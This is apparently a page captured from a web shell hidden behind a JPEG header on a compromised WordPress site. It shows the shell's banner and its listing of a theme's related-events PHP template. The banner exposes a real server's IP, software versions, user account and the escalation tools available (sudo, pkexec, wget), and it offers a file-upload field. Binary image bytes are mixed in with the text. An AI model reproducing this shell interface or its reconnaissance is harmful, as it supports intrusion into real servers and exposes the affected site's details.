????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.221.83.34 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/www.astacus.eu/wp-content/themes/Avada/tribe-events/pro/ |
Upload File : |
<?php /** * Related Events Template * The template for displaying related events on the single event page. * * You can recreate an ENTIRELY new related events view by doing a template override, and placing * a related-events.php file in a tribe-events/pro/ directory within your theme directory, which * will override the /views/related-events.php. * * You can use any or all filters included in this file or create your own filters in * your functions.php. In order to modify or extend a single filter, please see our * readme on templates hooks and filters * * @package TribeEventsCalendarPro * */ if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } $posts = tribe_get_related_posts(); if ( is_array( $posts ) && ! empty( $posts ) ) : ?> <div class="related-posts single-related-posts"> <?php echo Avada()->template->title_template( sprintf( __( 'Related %s', 'tribe-events-calendar-pro' ), tribe_get_event_label_plural() ), '3' ); ?> <ul class="tribe-related-events tribe-clearfix hfeed vcalendar"> <?php foreach ( $posts as $post ) : ?> <li> <?php $thumb = ( has_post_thumbnail( $post->ID ) ) ? get_the_post_thumbnail( $post->ID, 'large' ) : '<img src="' . esc_url( trailingslashit( Tribe__Events__Pro__Main::instance()->pluginUrl ) . 'src/resources/images/tribe-related-events-placeholder.png' ) . '" alt="' . esc_attr( get_the_title( $post->ID ) ) . '" />'; ?> <div class="tribe-related-events-thumbnail hover-type-<?php echo Avada()->settings->get( 'ec_hover_type' ); ?>"> <a href="<?php echo esc_url( tribe_get_event_link( $post ) ); ?>" class="url" rel="bookmark"><?php echo $thumb ?></a> </div> <div class="tribe-related-event-info"> <h3 class="tribe-related-events-title summary"><a href="<?php echo tribe_get_event_link( $post ); ?>" class="url" rel="bookmark"><?php echo get_the_title( $post->ID ); ?></a></h3> <?php if ( $post->post_type == Tribe__Events__Main::POSTTYPE ) { echo tribe_events_event_schedule_details( $post ); } ?> </div> </li> <?php endforeach; ?> </ul> </div> <?php endif;